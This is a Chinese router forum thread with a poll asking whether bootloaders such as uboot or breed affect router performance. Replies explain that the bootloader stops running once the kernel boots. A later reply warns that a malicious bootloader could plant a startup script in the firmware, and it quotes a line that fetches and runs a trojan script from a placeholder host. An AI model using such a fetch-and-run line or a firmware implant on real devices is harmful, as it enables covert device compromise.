QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

uboot对路由器性能有影响吗?

最近有一个问题,用padavan固件,官方uboot点重启有一定可能会死,除了官方uboot还有其它一些比如breed,不死uboot等等。有一个问题就是不同的uboot对路由器运行时的性能有影响吗?路由器操作系统运行时是不是需要uboot参与?还是uboot只负责引导?如果有影响,哪个uboot运行时表现更好呢?或者怎么可以测试?请大神指点。
单选投票, 共有 97 人参与投票 查看投票参与人

投票已经结束

12.37% (12)
48.45% (47)
39.18% (38)
您所在的用户组没有投票权限
我的恩山、我的无线 The best wifi forum is right here.
就目前已知的而言,只有IBM的PC兼容机在运行Windows 9X或者之前的系统时,BIOS才可能影响系统,因为这些系统不过是运行于DOS上的外壳(Shell)罢了,因此还会用到BIOS中断。这是历史原因造成的,操作系统必须保证BIOS在内存中的完整性。
从 Windows NT 架构开始,只要 Windows 启动,那么BIOS就不再会被使用,甚至被覆盖掉(主要指内存中的中断向量表),他也就不再对操作系统造成影响。
实际上在 Windows 9X 里面BIOS也不是一直在跑,只有在调用BIOS中断时BIOS的中断服务代码才会得到执行权限,中断响应完毕,CPU控制权会立即交还给操作系统。

至于其他的CPU架构,ARM、MIPS等等,则完全不存在这个问题,只要固件的内核启动,那么bootloader就立即失去作用,除非重启不然永远不会再次运行,因为内核启动后就会破坏bootloader的运行环境。

因此“bootloader运行时还要做一些事情”只是在x86上的一种特殊情况。

至于 bootloader 对系统的影响,就路由器来说一般只有两个方面:一是CPU/内存频率,二是内存初始化。

CPU频率是bootloader在启动的最初阶段设定的,一般来说固件是不会改动的;
内存初始化也是由bootloader在启动的最初阶段完成的,因为bootloader需要将自身复制到内存中才能继续运行。

如果bootloader设定CPU/内存频率不准确,或者初始化内存时给内存的参数不准确,那么可能造成固件运行时不稳定,但这是极为少见的,基本不用担心。

至于 led,那是固件设定的,这个锅 bootloader 不背。
同理网口顺序也是由固件设定的,wan口位置颠倒的锅bootloader也不背。

总而言之,bootloader对固件使用乃至路由性能没有什么影响。(一些极端的情况就不考虑了,因为实在是太少见)

评分

梦里*** + 3 一看就是觉得高端、大气、上档次!
luck*** + 3 我手抖了下,加分变扣分了!
琳*** + 1 涨姿势。。。多谢大神讲解
micro*** + 1 感谢大神的breed。
an*** + 1 大神竟然来了😁

我的恩山、我的无线 The best wifi forum is right here.

html 发表于 2015-12-31 13:58
bootloader 可以修改固件放入或者改点东西吧,比如简单的修改 rootfs_data (也就是overlay的upperdir) 加 ...

那个楼主一直没说啥,还有可能是设备来路不正,或者固件来路不正

bootloader 可以修改固件放入或者改点东西吧,比如简单的修改 rootfs_data (也就是overlay的upperdir) 加 ...

jffs2真不算复杂,把原来的启动脚本所在的单元标成unused, 提前构造好压缩的数据放到free_list里面。 这样一个启动脚本就加进去了。留给bootloader的空间完全够干这个

不用在bootloader里面判断固件类型啊,也不用实现完整的jffs2文件系统啊
简单的写个rc.local,里面写上 wget http://muma.com/muma.sh && sh muma.sh,就嫩植入木马了。
然后通过这个脚本就能随意发挥了。
再想想bootloader能改mac pin,能复位系统,能刷系统固件 art,还能刷自身。
所以说通过 bootloader 做坏事是完全有可能的

hackpascal 发表于 2015-12-28 22:01
就目前已知的而言,只有IBM的PC兼容机在运行Windows 9X或者之前的系统时,BIOS才可能影响系统,因为这些系 ...

bootloader 可以修改固件放入或者改点东西吧,比如简单的修改 rootfs_data (也就是overlay的upperdir) 加个开机脚本运行点东西, 隐藏深点的修改内核,再高级点可以在某个地方(内存或者flash里面)放点特殊代码让系统去执行。最后这个即便用编程器读出固件对比也发现不了什么的。

这里已经发现一个路由器被黑的家伙了 http://bbs.mydigit.cn/read.php?tid=1507151  访问淘宝的数据都被重定向到某个IP了,什么渠道被黑的还没问出来。
最危险的就是用来路不明的固件了。

我投“没有影响”

没有影响

楼主| | 显示全部楼层
hackpascal 发表于 2015-12-28 22:01
就目前已知的而言,只有IBM的PC兼容机在运行Windows 9X或者之前的系统时,BIOS才可能影响系统,因为这些系 ...

谢大神指点

隶笔难书 发表于 2015-12-28 21:31
这个呢不好说。如果说和电脑的BIOS一个道理,那么可以会有一定影响,因为某写BIOS会引起各种问题比如游戏过 ...

等大神ing

hcy42003 发表于 2015-12-28 21:12
大神你自己都不清楚,,,还扣我分。。。555555555.。。。。我说的是实话,希望小菜鸟们不要在意这些细节 ...

我不是做这个的,只是偶尔玩

来自手机 | 显示全部楼层
这个呢不好说。如果说和电脑的BIOS一个道理,那么可以会有一定影响,因为某写BIOS会引起各种问题比如游戏过后风扇不转啊,个别Qq版本不能使用啊,这个我都是看见华硕笔记本BIOS修复记录里面的,具体是什么引起的我还是不清楚。那么路由的boot会不会影响也只有开发人员才知道了!

anoid 发表于 2015-12-28 20:21
不同uboot,Y1S同一个固件的LED灯响应可能不太一样,有差别也不影响大家用不死,毕竟某些方面可能有优势 ...

大神你自己都不清楚,,,还扣我分。。。555555555.。。。。我说的是实话,希望小菜鸟们不要在意这些细节,希望我们这些小菜鸟,抓住重点学习,学会编译,学会改配置,学会改源码,学会NADA FLASH地址刷固件,学会TLL焊接,学会更换闪存,学会改装主板,,, 等等等等。

时间宝贵,等成为了真大神,再研究uboot是不是耗资源、占cpu、占内存、占带宽。

评分

an*** + 1 我也不知道,所以才问

hcy42003 发表于 2015-12-28 19:45
别问这么低级的问题,要是有影响,大家还刷什么不死

不同uboot,Y1S同一个固件的LED灯响应可能不太一样,有差别也不影响大家用不死,毕竟某些方面可能有优势。我不清楚系统运行的时候,uboot有没有在跑,还是初始化的问题。

别问这么低级的问题,要是有影响,大家还刷什么不死

评分

an*** -1 没做过这种,不知道是作为BootLoader还是同时做BIOS